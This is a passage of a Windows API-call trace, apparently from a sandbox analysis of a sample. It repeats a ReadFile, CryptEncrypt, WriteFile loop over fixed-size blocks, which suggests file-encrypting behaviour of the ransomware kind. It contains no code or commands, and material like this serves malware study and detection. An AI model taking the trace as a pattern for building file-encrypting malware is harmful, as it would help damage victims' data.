lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.248] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.248] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.248] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.248] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.249] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.249] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.249] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.249] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.249] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.249] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.249] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.249] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.249] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.249] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.249] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.249] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.249] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.249] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.250] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.250] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.250] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.250] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.250] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.250] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.250] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.250] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.250] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.250] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.250] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.250] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.250] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.250] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.250] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.250] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.251] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.251] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.251] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.251] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.251] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.251] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.251] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.251] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.251] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.251] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.251] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.251] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.251] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.251] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.252] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.252] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.252] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.252] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.252] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.252] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.252] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.252] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.252] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.252] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.252] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.252] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.252] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.252] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.252] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.252] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.252] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.253] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.253] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.253] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.253] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.253] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.253] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.253] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.253] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.253] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.253] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.253] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.253] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.253] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.253] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.254] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.254] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.254] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.254] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.254] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.254] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.254] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.254] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.254] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.254] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.254] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.254] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.254] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.254] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.254] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.255] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.255] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.255] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.255] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.255] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.255] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0271.255] CryptEncrypt (in: hKey=0x2fa788, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0271.255] WriteFile (in: hFile=0x5d4c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, 